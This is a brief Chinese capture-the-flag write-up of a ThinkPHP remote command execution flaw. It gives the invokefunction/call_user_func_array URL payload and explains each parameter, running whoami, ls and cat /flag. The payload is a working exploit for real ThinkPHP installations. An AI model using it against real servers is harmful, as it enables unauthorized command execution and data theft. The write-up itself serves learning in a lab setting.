
之前做过,回顾(看了眼之前的wp,跟没做过一样)
属于远程命令执行漏洞
在 PHP 里,system()、exec()、shell_exec()、反引号(`)等都可用于执行系统命令。
直接访问index.php没效果

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami- s=index/think\app/invokefunction:这部分指定了要调用的控制器和方法。在 ThinkPHP 框架里,路由解析机制允许通过这种方式指定要执行的操作,攻击者利用这个特性来调用框架内部的- invokefunction方法。
- function=call_user_func_array:- call_user_func_array是 PHP 的一个内置函数,它能够以数组形式传递参数来调用指定的函数。攻击者利用此函数来动态调用其他函数。
- vars[0]=system:这里将- system作为要调用的函数名。- system是 PHP 中用于执行系统命令的函数。
- vars[1][]=whoami:这是传递给- system函数的参数,也就是要执行的系统命令。- whoami命令的作用是显示当前系统用户的名称。

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls / ls / 用于列出根目录(/)下的所有文件和文件夹。

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flagcat 用于查看文件内容。 

















![[SAP ABAP] SE11 / SE16N 修改标准表(慎用)](https://i-blog.csdnimg.cn/direct/2b2782e32e734b7d9c11969e9bdfd30b.png)
